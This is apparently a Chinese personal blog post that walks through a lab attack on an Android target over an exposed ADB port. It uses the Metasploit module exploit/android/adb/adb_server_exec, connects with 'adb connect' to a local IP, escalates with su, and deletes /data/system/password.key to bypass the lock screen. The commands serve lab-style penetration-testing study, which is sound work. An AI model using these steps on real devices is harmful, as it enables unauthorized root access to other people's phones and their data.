梦の博客 欢迎来到我的破站
歌曲封面 未知作品

网站已运行 362 天 19 小时 15 分

Powered by Typecho & Sunny

5 online · 55 ms

Title

adb漏洞

云梦

·

Article
⚠️ 本文最后更新于2023年06月19日,已经过了313天没有更新,若内容或图片失效,请留言反馈

(1)开启msf。

♾️ abap 代码:
msfconsole -q

(2)利用msf工具去搜索adb的漏洞模块。

♾️ abap 代码:
search adb
lj28200g.png

(3)使用2016的远程命令执行漏洞的模块,调用模块

♾️ abap 代码:
use exploit/android/adb/adb_server_exec 或者 use 3

(4)配置攻击模块信息。
lj287x33.png

(5)adb工具连接。
lj289nhz.png
利用了msf的脚本,发现靶机的shell无法反弹
我们需要用到adb这个工具去连接,但因kali里没有自带这个工具,我们需要自己下载
adb工具:下载命令apt-get install adb 下载完成后接下来就进行连接

♾️ abap 代码:
adb connect 192.168.2.118:5555
adb shell
lj28f23w.png
可以看见的是shell已经反弹成功,输入su即可获取root权限

看见靶机的页面还是需要密码才能解锁的
lj28gk1r.png
安卓系统的锁屏密码通常是存放在/data/system这个文件夹里面,我们先用这个命令

♾️ abap 代码:
cd /data/system来进入这个文件夹

lj28hra8.png
查看一下这里哪个文件是存放密码的
lj28icns.png
可以看见password.key这个是存放密码的,我们把他删除掉即可绕过密码登录直接进入主页面

♾️ abap 代码:
rm password.key

lj28j31q.png
来到靶机页面,点回车,直接进入系统。
lj28jrq3.png

现在已有 0 条评论,0 人点赞
Comment
发表
搜 索 消 息 足 迹
你还不曾留言过..
你还不曾留下足迹..
博主